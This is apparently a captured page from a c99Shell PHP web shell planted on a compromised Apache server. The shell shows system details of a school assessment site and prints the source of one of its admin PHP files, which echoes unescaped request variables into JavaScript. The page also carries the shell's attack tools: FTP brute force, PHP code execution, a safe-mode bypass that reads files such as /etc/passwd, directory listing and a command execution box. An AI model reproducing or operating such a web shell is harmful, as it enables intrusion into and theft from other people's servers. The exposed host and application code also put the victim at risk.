110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/mis/eassess/admin/fileupdate/eassess/admin/ drwxr-xr-x Free 53.7 GB of 127.8 GB (42.02%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout


<?

include_once "../global1.php";

include_once "../../class/clsConnection.php";

include_once "../../class/clsDB.php";

include_once "../class/clsHoldCourseTmp.php";



$oCA = new clsConnection($GLOBALS['HOST'], $GLOBALS['DB_EASS'], $GLOBALS['USER_EASS'], $GLOBALS['PASSWORD_EASS']);



$oHCT = new HoldCourseTmp($oCA);



if($method=="add"){

    if(!isset($defineid))

        $defineid=0;

    if($selectFlag==7){

        $oHCT->DeleteByClassId($classId);

        for($i=0; $i<$cnt; $i++){

            if($ttId[$i]) {    

                $oHCT->AddNew();

                $oHCT->holdid=$holdid;

                $oHCT->classId=$classId;

                $oHCT->ttId=$ttId[$i];

                $oHCT->officerId=$officerId[$i];

                $oHCT->Save();

            }

        }

        ?><script language="javascript1.2">

            window.opener.location.href="./editCourseInProgramTableTmp.php?assid=<?=$assid;?>&acadYear=<?=$acadYear;?>&semester=<?=$semester;?>&startDate=<?=$startDate;?>&endDate=<?=$endDate;?>&closeDate=<?=$closeDate;?>&selectFlag=<?=$selectFlag;?>&isPreAssess=<?=$isPreAssess;?>&edit=<?=$edit;?>&defineid=<?=$defineid;?>&noAss=<?=$noAss;?>,'PopUp','toolbar=0,scrollbars=1,location=0,statusbar=0,menubar=0,resizable=0,width=540,height=650,left = 240,top = 10'";

            window.close();

        </script>

        <?

    }elseif($selectFlag==8){

        $oHCT->DeleteByClassId($classId);

        for($i=0; $i<$cnt; $i++){

            if($officerId[$i]) {    

                $oHCT->AddNew();

                $oHCT->holdid=$holdid;

                $oHCT->classId=$classId;

                $oHCT->officerId=$officerId[$i];

                $oHCT->Save();

            }

        }

        ?><script language="javascript1.2">

            window.opener.location.href="./editCourseInProgramTableTmpF8.php?assid=<?=$assid;?>&acadYear=<?=$acadYear;?>&semester=<?=$semester;?>&startDate=<?=$startDate;?>&endDate=<?=$endDate;?>&closeDate=<?=$closeDate;?>&selectFlag=<?=$selectFlag;?>&isPreAssess=<?=$isPreAssess;?>&edit=<?=$edit;?>&defineid=<?=$defineid;?>&noAss=<?=$noAss;?>,'PopUp','toolbar=0,scrollbars=1,location=0,statusbar=0,menubar=0,resizable=0,width=540,height=650,left = 240,top = 10'";

            window.close();

        </script>

        <?

    }else{

        $oHCT->DeleteAll();

        for($i=0; $i<$cnt; $i++){

            if($classId[$i]) {    

                $oHCT->AddNew();

                $oHCT->holdid=$holdid;

                $oHCT->classId=$classId[$i];

                $oHCT->Save();

            }

        }

    ?>

            <script language="javascript1.2">

                window.opener.location.href="editDefineSomeCourse.php?defineid=<?php echo $defineid;?>&assid=<?php echo $assid;?>&acadYear=<?php echo $acadYear;?>&semester=<?php echo $semester;?>&startDate=<?php echo $startDate;?>&endDate=<?php echo $endDate;?>&closeDate=<?php echo $closeDate;?>&selectFlag=<?php echo $selectFlag;?>&isPreAssess=<?=$isPreAssess;?>&defineid=<?=$defineid;?>&noAss=<?=$noAss;?>";

                window.close();



            </script>

    <?    



    }    

} //end if method 



?>

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Command execute ::
Enter:	Select: